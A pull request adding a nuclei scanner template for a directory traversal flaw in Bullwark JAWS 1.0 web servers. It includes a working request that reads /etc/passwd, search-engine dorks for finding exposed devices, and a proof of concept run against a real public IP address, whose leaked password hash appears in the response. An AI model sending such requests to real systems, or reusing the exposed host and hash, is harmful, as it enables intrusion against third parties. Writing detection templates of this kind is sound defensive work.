### PR TITLE
Add Bullwark Momentum Series JAWS 1.0 - Directory Traversal

### DIFF
--- a/vulnerabilities/bullwark-momentum-series-directory-traversal.yaml
+++ b/vulnerabilities/bullwark-momentum-series-directory-traversal.yaml
@@ -1,0 +1,37 @@
+id: Bullwark Momentum Series
+
+info:
+  name: Bullwark Momentum Series JAWS 1.0 - Directory Traversal
+  author: pikpikcu
+  severity: high
+
+# Refrence:-https://www.exploit-db.com/exploits/47773
+# Vendor Homepage: http://www.bullwark.net/
+# Version : Bullwark Momentum Series Web Server JAWS/1.0
+# Software Link : http://www.bullwark.net/Kategoriler.aspx?KategoriID=24
+# Shodan Dork: https://www.shodan.io/search?query=Bullwark&page=1
+# fofa dork:-https://fofa.so/result?q=Bullwark&qbase64=QnVsbHdhcms%3D
+# Test demo:-http://78.186.157.88:5001
+
+requests:
+  - raw:
+      - | #Default Port
+        GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1
+        Host: {{Hostname}}:5001
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+        X-Requested-With: XMLHttpRequest
+        Referer: {{Hostname}}:5001/
+      - | #Requests Port
+        GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+        X-Requested-With: XMLHttpRequest
+        Referer: {{Hostname}}
+
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        word:
+          - "root:"

--- a/vulnerabilities/bullwark-momentum-series-directory-traversal.yaml
+++ b/vulnerabilities/bullwark-momentum-series-directory-traversal.yaml
@@ -1,4 +1,4 @@
-id: Bullwark Momentum Series
+id: bullwark-momentum-directory-traversal
 
 info:
   name: Bullwark Momentum Series JAWS 1.0 - Directory Traversal
@@ -11,27 +11,22 @@ info:
 # Software Link : http://www.bullwark.net/Kategoriler.aspx?KategoriID=24
 # Shodan Dork: https://www.shodan.io/search?query=Bullwark&page=1
 # fofa dork:-https://fofa.so/result?q=Bullwark&qbase64=QnVsbHdhcms%3D
-# Test demo:-http://78.186.157.88:5001
 
 requests:
   - raw:
-      - | #Default Port
-        GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1
-        Host: {{Hostname}}:5001
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
-        X-Requested-With: XMLHttpRequest
-        Referer: {{Hostname}}:5001/
-      - | #Requests Port
+      - |
         GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1
         Host: {{Hostname}}
         User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
         X-Requested-With: XMLHttpRequest
         Referer: {{Hostname}}
 
+    matchers-condition: and
     matchers:
       - type: status
         status:
           - 200
+
       - type: word
         word:
           - "root:"


### PR DESCRIPTION
## Bullwark Momentum Series JAWS 1.0 - Directory Traversal

#### Refrence
- https://www.exploit-db.com/exploits/47773
#### Software
- http://www.bullwark.net/Kategoriler.aspx?KategoriID=24
### Dork
- shodan: https://www.shodan.io/search?query=Bullwark&page=2
- fofa: https://fofa.so/result?q=Bullwark&qbase64=QnVsbHdhcms%3D
### Poc With Burpsuite
Demo: http://78.186.157.88:5001
Requests:
```bash
GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 78.186.157.88
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
X-Requested-With: XMLHttpRequest
Referer: http://78.186.157.88
```
Response:
```
HTTP/1.1 200 OK
Server: JAWS/1.0 Feb 14 2017
Content-Type: application/octet-stream
Date: Sat,  5 Sep 2020 15:05:53 GMT
Last-Modified: Thu, 21 Aug 2014 01:19:10 GMT
Content-Length: 38

root:a03e3thxwWU0g:0:0::/root:/bin/sh
```
### Response nuclei-template
```
                       __     _ 
     ____  __  _______/ /__  (_)
    / __ \/ / / / ___/ / _ \/ / 
   / / / / /_/ / /__/ /  __/ /  
  /_/ /_/\__,_/\___/_/\___/_/   v2.1									  

		projectdiscovery.io

[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[WRN] nuclei-templates are not installed, use update-templates flag.
[INF] [Bullwark Momentum Series] Loaded template Bullwark Momentum Series JAWS 1.0 - Directory Traversal (@pikpikcu) [high]
[INF] Using 1 rules (1 templates, 0 workflows)                                                                                                                                                       [11:07:00]
[Bullwark Momentum Series] [http] http://78.186.157.88:5001/../../../../../../../../../../../../../etc/passwd
[Bullwark Momentum Series] [http] http://78.186.157.88/../../../../../../../../../../../../../etc/passwd

```